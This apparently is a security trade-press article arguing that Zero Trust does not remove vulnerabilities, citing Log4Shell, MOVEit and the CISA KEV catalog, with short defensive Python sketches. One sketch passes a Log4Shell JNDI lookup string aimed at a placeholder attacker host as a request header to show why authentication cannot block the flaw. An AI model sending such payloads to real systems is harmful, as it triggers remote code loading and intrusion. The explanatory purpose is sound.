The Era of APIs and Vulnerabilities: Security Operations Beyond Zero Trust ①
The existence of a vulnerability in itself means the possibility of an attack... the speed of vulnerability removal is 'key'
Even with Zero Trust in place, vulnerabilities remain unresolved... real-time vulnerability detection and removal is urgently needed
[DataNet] 'Zero Trust', which has led the shift in the cyber security paradigm, has now reached the point of considering what comes next. Until now, Zero Trust strategies have focused on 'authentication before access,' while elements beyond access have gone largely unaddressed. In particular, 'asset identification and integrity verification,' the prerequisites for Zero Trust, have rarely been considered. This article examines security operations after Zero Trust, focusing on asset and vulnerability management. <Editor's Note>
Over the past decade, the cyber security paradigm has shifted from 'how to protect the perimeter' to 'how to verify trust.' Zero Trust lies at the center of this. The principle of 'Never trust, always verify' was an inevitable response strategy that emerged in an environment where traditional perimeter-based security had collapsed. The transition to the cloud, remote work, and the proliferation of API-based systems have rendered network perimeters virtually meaningless. In this environment, Zero Trust has established itself as a core framework for strengthening access control and authentication.
However, at this point, we must ask a more fundamental question: is Zero Trust enough? More precisely, Zero Trust may be a 'necessary condition' for defending against the current attack environment, but is it also a 'sufficient condition'?
The answer to this question is becoming increasingly clear. Attackers no longer try to 'bypass trust'; they 'go straight to vulnerabilities.' In other words, the central axis of security is moving from pre-authentication to post-authentication.
Limitations of Currently Implemented ZTA
A critical premise must first be clarified in this discussion. The latest Zero Trust Architecture (ZTA) specifications, represented by NIST SP 800-207, are a comprehensive framework that includes microsegmentation, continuous trust evaluation, and even runtime behavior analysis. Theoretically, abnormal behavior after authentication is also included within the detection scope.
The problem is that the ZTA implemented in actual fields falls far short of this theoretical perfection. The Zero Trust adopted by most organizations is essentially summarized as a combination of enhanced Multi-Factor Authentication (MFA), identity-based access control, and the principle of least privilege. This is focused on controlling "who can access," and provides only limited visibility and control over "what is possible after access," specifically "what is possible through vulnerabilities."
Modern attacks exploit this very gap. Attackers enter systems naturally by stealing valid authentication credentials, utilizing legitimate API call paths, or exploiting communication between internal services. After that, they perform privilege escalation, data exfiltration, and system takeover based on vulnerabilities. In this process, Zero Trust is no longer a "barrier" but becomes the "environment after passing through."
Attacks Occur Despite the Existence of Authentication
This pattern is not theory but a repeatedly verified reality. The Log4Shell vulnerability (CVE-2021-44228), disclosed in December 2021, is an extreme example. It was a remote code execution flaw in the Apache Log4j library, and global scanning and exploitation began within hours of its disclosure. The vulnerability did not bypass the authentication system; rather, it entered through the logging pipeline itself, which operates independently of authentication. No matter how sophisticated the access controls in place, any environment running a vulnerable Log4j version was exposed to the same risk.
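Why a logging flaw sits outside the reach of authentication can be shown with a minimal sketch. This is not Log4j itself; the handler and token check below are hypothetical, and serve only to illustrate that attacker-controlled input reaches the logging layer before any credential is verified.

```python
import logging

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("access")

def handle_request(headers: dict) -> str:
    # 1. Logging runs first, on raw, unauthenticated input.
    #    With Log4Shell, a crafted value here (a JNDI lookup string)
    #    triggered code execution inside the logger itself.
    log.info("request from UA=%s", headers.get("User-Agent", "-"))
    # 2. Authentication only happens afterwards -- too late to help.
    if headers.get("Authorization") != "Bearer valid-token":
        return "401 Unauthorized"
    return "200 OK"

# The request is rejected, but the malicious string was already logged.
print(handle_request({"User-Agent": "${jndi:ldap://attacker/a}"}))  # → 401 Unauthorized
```

The point is structural: the vulnerable code path executes regardless of the authentication outcome, so stronger access control cannot close it.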
The same applies to the MOVEit vulnerability (CVE-2023-34362) that occurred in 2023. This was a SQL injection vulnerability found in Progress Software's file transfer solution, MOVEit, which the Cl0p ransomware group exploited to steal data from hundreds of organizations.
Many of the victimized organizations had MFA and access control policies in place. However, vulnerabilities at the service layer, beyond the point of authentication, were outside what those policies could prevent. In this way, 'authenticated attacks,' along with direct intrusion through service vulnerabilities unrelated to authentication, are becoming a standard form of attack.
The Temporal Value of Vulnerabilities Transformed by AI
The recent advancement of AI technology complicates the situation further. In the past, vulnerability discovery and exploit development required a high level of expertise and time. Now, vulnerability analysis, PoC (Proof of Concept) generation, and attack path design are being rapidly automated through Large Language Models (LLMs) and automation tools.
Attackers can almost automatically perform processes such as inferring the API structure of a specific system, analyzing input patterns, and searching for potential vulnerabilities.
Furthermore, they can construct attack chains by linking multiple vulnerabilities. These changes are fundamentally altering the 'temporal value' of vulnerabilities. In the case of Log4Shell, exploits spread within hours of disclosure, and for MOVEit, attacks continued even after the patch was released.

The pattern shown in the Known Exploited Vulnerabilities (KEV) catalog of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) tells the same story. A significant number of vulnerabilities are exploited in real attacks within days of disclosure. Where there used to be a buffer of weeks or months between patch distribution and widespread attacks, that window is now narrowing drastically.
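The KEV catalog is published as a machine-readable JSON feed, so the narrowing window can be tracked operationally. The sketch below filters a KEV-style catalog for recently added entries; the field names (`cveID`, `dateAdded`, `dueDate`) follow CISA's published schema, but the two sample records are illustrative stand-ins, not a live feed.

```python
from datetime import date

# KEV-style sample records (illustrative; a real pipeline would fetch
# CISA's known_exploited_vulnerabilities.json feed instead).
SAMPLE_KEV = {
    "vulnerabilities": [
        {"cveID": "CVE-2021-44228", "dateAdded": "2021-12-10",
         "dueDate": "2021-12-24"},
        {"cveID": "CVE-2023-34362", "dateAdded": "2023-06-02",
         "dueDate": "2023-06-23"},
    ]
}

def added_since(catalog: dict, cutoff: date) -> list[str]:
    """Return CVE IDs whose KEV dateAdded is on or after the cutoff."""
    return [v["cveID"] for v in catalog["vulnerabilities"]
            if date.fromisoformat(v["dateAdded"]) >= cutoff]

print(added_since(SAMPLE_KEV, date(2023, 1, 1)))  # → ['CVE-2023-34362']
```

Polling the feed on a schedule and diffing against the asset inventory turns KEV from a reference document into a trigger for urgent remediation.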
This clearly demonstrates the fact that "a vulnerability is in an attackable state the moment it exists." And this state persists regardless of Zero Trust implementation. Even if authentication is strengthened and policies become more sophisticated, the possibility of an attack does not disappear as long as vulnerabilities remain.
At this point, the fundamental limitation of ZTA implemented in the field is revealed. Zero Trust controls "who enters," but it does not resolve "what is left open." In other words, while Zero Trust can contribute to reducing the attack surface, it does not remove the vulnerabilities themselves.
Another critical issue is the structural complexity of modern systems. Microservices, containers, serverless, and dependence on various external APIs decompose systems into hundreds or thousands of interconnected components. In this structure, a single vulnerability is not a single-point problem but a potential risk factor that can spread through the entire graph. In particular, vulnerabilities that repeatedly appear in the same vendor, same library, and same configuration patterns are structurally amplified.
In such an environment, simply listing individual vulnerabilities and prioritizing them is not enough. One must consider where a vulnerability is located within the structure, through which path it can be linked to an attack chain, and under what conditions it converts into an actual attack. Security is no longer a matter of static inspection, but a matter of dynamic system analysis.
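The structural view described above can be sketched as a graph problem: a vulnerability matters most when it sits on a path from an internet-facing entry point to a critical asset. The component names and edges below are hypothetical, and the reachability check is a deliberately minimal BFS, not a full attack-path engine.

```python
from collections import deque

# Hypothetical service dependency graph (directed edges = calls/access).
EDGES = {
    "api-gateway": ["auth-svc", "file-svc"],
    "auth-svc": ["user-db"],
    "file-svc": ["object-store", "report-svc"],
    "report-svc": ["user-db"],
}

def reachable(start: str) -> set[str]:
    """All components reachable from `start`, via breadth-first search."""
    seen, queue = {start}, deque([start])
    while queue:
        node = queue.popleft()
        for nxt in EDGES.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen

def on_attack_path(entry: str, vulnerable: str, asset: str) -> bool:
    """True if the entry point reaches the vulnerable component AND
    the vulnerable component reaches the critical asset."""
    return vulnerable in reachable(entry) and asset in reachable(vulnerable)

print(on_attack_path("api-gateway", "report-svc", "user-db"))  # → True
```

Even this toy version captures the shift the text describes: the same CVE scores differently depending on where the affected component sits in the graph.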
Solving 'Security' Issues in a Zero Trust Environment
A significant portion of the 'Post-Zero Trust' security environment has already been established. The core question in this environment should no longer focus on 'whom to trust,' but rather on 'which vulnerabilities convert into attacks and when.' This shift demands a transformation of the operational paradigm, not just a simple technical change.
Periodic vulnerability assessments, formal compliance checks, and static prioritization based on CVSS scores are no longer sufficient. Instead, we need a system that observes vulnerabilities in real-time, dynamically evaluates their risk levels, and removes them before they transition into attacks. Ultimately, the essence of security is shifting from 'preventing intrusion' to a 'race of speed in removing vulnerabilities.' The moment one falls behind in this race, the attacker is already inside.
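The move from static CVSS ranking to dynamic evaluation can be illustrated with a small scoring sketch. The multipliers below are illustrative assumptions, not an established standard; the point is only that live signals such as known exploitation (e.g. a KEV listing) and internet exposure should be able to outrank raw severity.

```python
def dynamic_risk(cvss: float, known_exploited: bool, internet_exposed: bool) -> float:
    """Adjust a static CVSS score with live exploitation/exposure signals.
    Weights are illustrative only."""
    score = cvss
    if known_exploited:
        score *= 1.5   # active exploitation outweighs raw severity
    if internet_exposed:
        score *= 1.2   # reachable attack surface raises urgency
    return min(score, 10.0)  # clamp to the CVSS 0-10 scale

# An actively exploited, exposed 7.5 outranks an unexploited internal 9.8.
findings = [
    ("CVE-A (9.8, internal, not exploited)", dynamic_risk(9.8, False, False)),
    ("CVE-B (7.5, exposed, in KEV)", dynamic_risk(7.5, True, True)),
]
findings.sort(key=lambda f: f[1], reverse=True)
print([name for name, _ in findings])  # CVE-B ranks first
```

A real system would recompute such scores continuously as KEV entries, exposure scans, and asset data change, which is exactly the 'race of speed' the text describes.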
In the next article, we will cover the 'API-centric attack surface' and the issue of 'Shadow APIs,' which are the core causes of these changes. We will analyze why the APIs we fail to manage have become the most dangerous assets and how AI is explosively expanding these invisible attack surfaces.